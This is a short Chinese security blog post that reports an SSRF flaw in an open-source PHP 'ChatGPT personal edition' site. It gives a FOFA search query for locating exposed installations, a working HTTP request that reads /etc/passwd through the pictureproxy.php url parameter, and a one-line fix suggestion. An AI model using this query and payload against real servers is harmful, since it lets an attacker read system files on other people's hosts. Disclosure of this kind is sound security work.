chatgpt个人版ssrf漏洞

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
菩提小狗1 天前
每日安全情报报告 · 2026-08-23
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗4 天前
每日安全情报报告 · 2026-08-20
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗6 天前
每日安全情报报告 · 2026-08-18
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安7 天前
WiFi安全攻防实战:WPA3新协议与传统破解技术全解析
开发语言·网络·安全·php·漏洞·nmap·漏洞检测
菩提小狗7 天前
每日安全情报报告 · 2026-08-17
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗9 天前
每日安全情报报告 · 2026-08-15
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安11 天前
HTTP请求走私攻击实战:CL.TE与TE.CL绕过前端服务器全解析
服务器·前端·网络·web安全·http·架构·漏洞
菩提小狗11 天前
每日安全情报报告 · 2026-08-12
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安11 天前
漏洞复现实战大全:CVE漏洞环境搭建与利用全流程详解
安全·黑客·漏洞·nmap·漏洞复现·漏洞检测·虚拟机靶场
Yan_chen66612 天前
CTFHub XSS反射型实战攻略
前端·网络安全·漏洞·xss·ctfhub web前置技能